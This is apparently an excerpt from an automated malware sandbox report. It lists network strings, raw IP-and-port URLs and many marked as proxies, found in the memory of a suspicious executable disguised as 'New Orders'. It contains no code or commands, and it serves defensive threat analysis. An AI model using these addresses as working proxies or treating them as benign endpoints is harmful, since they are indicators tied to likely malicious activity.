                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.172.79.17:8000
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.172.79.17:8000://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.249.254
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.249.254.70:1080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.249.254.70:1080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25A38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.249.29.218:999
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25A38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.249.29.218:999://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25A38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.249.29.218:999ib
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.249.29.220:999
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.249.29.220:999://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.250.181.133:999
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.250.181.133:999://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.250.222.233:999
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.250.222.233:999://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2839C000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.71.
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2839C000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.71.5.83:3128
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2839C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.71.5.83:3128://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.71.5.83:8080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.71.5.83:8080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25A38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.86.102.169:16823
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25A38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.86.102.169:16823://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2571A000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25CCB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.86.115.103:55066
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD253E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.86.115.103:55066://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.86.69.142:42214://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.86.69.142:45364
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.86.69.142:45364://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD299D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://168.126.74.132
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD297CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://168.126.74.132://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD297CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://168.126.74.132:80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://168.181.81.225:9090
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://168.181.81.225:9090://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://168.194.171
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://168.194.171.16:999
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://168.194.171.16:999://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://168.196.158.15:1080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://168.196.158.15:1080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2610C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://168.205.217.13:4145
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2610C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://168.205.217.13:4145://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://168.205.217.37:4145
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://168.205.217.37:41458
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://168.205.217.37:4145://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD254E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://168.228.36.22:27234
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD254E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://168.228.36.22:27234://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://168.90.255.60:999
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://168.90.255.60:999://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://169.239.223.136
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://169.239.223.136:52178
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://169.239.223.136:52178://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2839C000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://169.239.45.51:4153
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2839C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://169.239.45.51:4153://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2573E000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD259E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://169.255.198.8:5678
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD259CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://169.255.198.8:5678://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://169.57.157.146:8123
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://169.57.157.146:8123://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://169.57.157.148
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://169.57.157.148://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://169.57.157.148:80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://170.210.121.190:8080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://170.210.121.190:8080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://170.238.180.21:4145
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://170.238.180.21:4145://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://170.239.205.1:999
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://170.239.205.1:999://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2839C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://170.239.205.3:999
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2839C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://170.239.205.3:999://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://170.239.207.241:999
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://170.239.207.241:999://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD26236000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://170.244.64.12:31476
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD26236000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://170.244.64.12:31476://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://170.80.242.98:999
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://170.80.242.98:999://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://170.81.108.46:4153
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://170.81.108.46:4153://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://171.100.23.244:5678
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://171.100.23.244:5678://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://171.22.108.
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://171.22.108.188:3128
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://171.22.108.188:3128://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://171.235.166.222:4019
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://171.235.166.222:4019://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2839C000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://171.244.140.160
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2839C000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://171.244.140.160:13391
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2839C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://171.244.140.160:13391://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD252EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://171.244.140.160:15141
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://171.244.140.160:27056
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://171.244.140.160:27056://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD254A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://171.244.140.160:37400
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD254A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://171.244.140.160:37400://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD26628000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://171.244.140.160:5189
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD26601000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://171.244.140.160:5189://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD256F0000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD256DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://171.248.209.6:1080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25708000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://171.248.209.6:1080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://171.97.107.108:4145
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://171.97.107.108:4145://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25A38000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD259E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.104.145.22:9064
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25A38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.104.145.22:9064://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD29AC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.105.52.78:31106
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD29AC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.105.52.78:31106://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.173.132.85
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.173.132.85://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.173.132.85:80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.233.255.11:3128
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.233.255.11:3128://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.235.10.53
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.235.10.53://proxyp
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25A38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.235.10.53:80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.64.152.98
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.64.152.98://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.64.152.98:80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.64.86.217
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.64.86.217://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.64.86.217:80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2610C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.105.234
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.105.234://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.105.234:80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.127.188
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.127.188://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.127.188:80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD26236000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.14.237
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD26236000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.14.237://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD26236000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.14.237:80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.150.173
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.150.173://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25159000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.150.173:80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.181.11
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.181.11://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.181.11:80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.181.12
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.181.129
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.181.129://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.181.129:80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.181.12://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.181.12:80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.181.147
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.181.147://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.181.147:80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.181.149
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.181.17
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.181.17://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.181.17:80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.181.197
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.181.197://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.181.197:80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.181.20
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.181.20://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.181.20:80
